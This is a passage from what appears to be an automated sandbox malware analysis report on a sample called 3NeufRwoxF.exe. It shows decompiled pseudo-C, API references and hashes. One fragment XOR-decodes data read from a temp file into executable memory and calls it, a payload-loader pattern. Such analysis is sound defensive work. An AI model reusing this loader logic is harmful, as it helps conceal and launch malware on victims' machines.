					 *((char*)(_t66 + _t58 - 0x189c)) = ((_t36 + 0x00000096 ^ 0x00000073) - 0x00000001 ^ 0x5b) - 0xbc + 0x13 - 0xdb + 0xcf;
					_t58 =  &(_t58->Internal);
				}
				_v6304();
				return 0;
			}

0x72b210a8
0x72b210b2
0x72b210bb
0x72b210c4
0x72b210cd
0x72b210d6
0x72b210df
0x72b210e5
0x72b210f5
0x72b21106
0x72b21120
0x72b2113f
0x72b21145
0x72b2115e
0x72b21164
0x72b21169
0x72b21169
0x72b21176
0x00000000
0x00000000
0x72b21190
0x72b21197
0x72b21197
0x72b211a9
0x72b211b0

APIs

GetTempPathW.KERNEL32(00000103,?), ref: 72B210F5
VirtualProtect.KERNELBASE(?,00001470,00000040,?), ref: 72B21120
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72B2113F
ReadFile.KERNELBASE(00001470,?,00001470,?,00000000), ref: 72B2115E

Memory Dump Source

Source File: 00000000.00000002.656907959.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000000.00000002.656896970.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.656922155.0000000072B22000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72b20000_3NeufRwoxF.jbxd

Similarity

API ID: File$CreatePathProtectReadTempVirtual
String ID:
API String ID: 205760209-0
Opcode ID: 0b8b66d72a7a30b31b1cebbd790044b79c4fd2cbad25c2dbd124dc60fca45c6f
Instruction ID: e406996fb9e2d3dde198b55ab7b86bcb2a22515806f3f8d9a9d49270ad9681ae
Opcode Fuzzy Hash: 0b8b66d72a7a30b31b1cebbd790044b79c4fd2cbad25c2dbd124dc60fca45c6f
Instruction Fuzzy Hash: 4421D375A24308ABEB14CBA4CC55BFE73B9EF44700F108458E209EB2C1EB756B05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218
1033, xrefs: 00403219

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
